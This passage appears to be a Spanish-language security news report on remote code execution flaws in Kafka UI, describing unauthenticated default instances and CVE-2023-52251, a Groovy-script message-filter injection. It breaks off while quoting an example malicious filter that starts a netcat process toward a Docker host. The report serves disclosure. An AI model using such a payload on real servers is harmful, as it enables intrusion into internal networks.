Una reciente investigación de seguridad ha revelado múltiples vulnerabilidades en la popular aplicación de código abierto Kafka UI, utilizada principalmente por desarrolladores y administradores para gestionar y monitorizar clusters de Apache Kafka. La herramienta, diseñada para ofrecer una representación visual de los clusters de Kafka conectados, no requiere autenticación en su configuración predeterminada, lo que ha resultado en muchas instancias de Kafka UI no protegidas, algunas incluso expuestas a la internet.
Uno de los descubrimientos más alarmantes señala que estas instancias sin protección representan una puerta de entrada potencial a redes internas, pudiendo exponer datos públicos o no sensibles, lo cual puede subestimarse como una amenaza de seguridad. La investigación detallada ha desvelado tres vulnerabilidades que permiten la ejecución remota de código (RCE) en Kafka UI. CVE-2023-52251: Ejecución de código arbitrario a través de scripts Groovy
El primer hallazgo, identificado como CVE-2023-52251, está relacionado con la funcionalidad de filtrado de mensajes de Kafka UI, que permite realizar consultas simples para filtrar mensajes en el servidor. Se descubrió que Kafka UI soporta el tipo de filtro GROOVY_SCRIPT, evaluando la consulta como un script Groovy, lo cual permite a un atacante ejecutar código arbitrario. Por ejemplo, un atacante puede crear un filtro malicioso con el contenido new ProcessBuilder("nc","host.docker.in...